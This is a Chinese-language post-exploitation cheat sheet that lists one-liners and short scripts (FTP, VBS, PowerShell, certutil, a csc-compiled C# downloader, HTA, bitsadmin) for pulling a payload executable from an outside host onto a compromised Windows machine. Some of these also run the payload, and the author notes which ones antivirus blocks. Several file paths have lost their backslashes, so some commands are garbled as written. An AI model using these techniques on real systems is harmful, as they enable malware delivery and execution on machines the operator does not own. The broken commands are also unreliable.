一句话下载总结(用于后渗透上传payload)

利用ftp来下载payload文件

echo open 192.168.1.1 21> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo ftp>> ftp.txt
echo GET 1.exe >> ftp.txt
ftp -s:ftp.txt

后记:这个我没有实验成功太菜了

利用vbs来下载payload

Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.1.1/1.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:	est1.exe",2

后记:这个已经利用成功了，网上说可以用script来执行，可能win10上面没有，但是可以直接双击运行，或者命令行里面直接使用,vbs脚本后缀为vbs

利用Powershell来下载payload

powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:	est1.exe');start-process 'C:	est1.exe'

后记:是在命令行中执行以上命令

利用certutil下载文件

直接下载certutil.exe -urlcache -split -f http://192.168.1.1/1.exe

指定文件名保存certutil.exe -urlcache -split -f http://192.168.1.1/1.txt 1.php


删除缓存certutil.exe -urlcache -split -f http://192.168.1.1/1.exe delete
查看缓存certutil.exe -urlcache *

至于这个缓存有什么用就不知道了
后记:下载的文件就在当前目录并且文件名与url相同(除非指定文件名保存)，360会拦截

利用CSC(windows的c#编译器)来下载文件

1.cs文件内容

using System.Net;
namespace downloader
{
    class Program
    {
        static void Main(string[] args)
        {
            WebClient client = new WebClient();
            string URLAddress = @"http://192.168.1.1/1.exe";
            string receivePath = @"C:	est";
            client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName
        (URLAddress));
        }
    }
}

后记:csc.exe位于C:WindowsMicrosoft.NETFrameworkv2.0.50727。因为未加入环境变量中所以需要指定路径。
使用方式：C:WindowsMicrosoft.NETFrameworkv2.0.50727csc.exe /out:C: es
tdownload.exe C: est1.cs
这样1.cs就会被编辑为exe文件，我们运行一下就会把文件下载下来了，360会进行拦截，估计是捕获了下载的时候的流量了，因为并不是直接就拦截了

hta下载文件

将下列代码保存至.hta文件

<html>
<head>
<script>
var Object = new ActiveXObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.1.1/1.exe",false);
Object.send();
if (Object.Status == 200)
{
    var Stream = new ActiveXObject("ADODB.Stream");
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.SaveToFile("C:\test\1.exe", 2);
    Stream.Close();
}
window.close();
</script>
<HTA:APPLICATION
WINDOWSTATE = "minimize">
</head>
<body>
</body>  
</html>

后记：直接双击运行既可或者命令行直接执行，360会拦截

利用bitsadmin下载文件

bitsadmin是一个控制台工具，可用于创建下载或上传工作和监测其进展情况。xp以后的Windows系统自带

bitsadmin /transfer n http://192.168.1.1/1.exe C: estupdate1.exe

后记:不支持https/ftp协议，php/python自带的服务器会报错,360会拦截

总结，其实感觉Windows上可以玩的东西比Linux多，使用的也比Linux多，这可能也是红蓝对抗偏向于这边的原因吧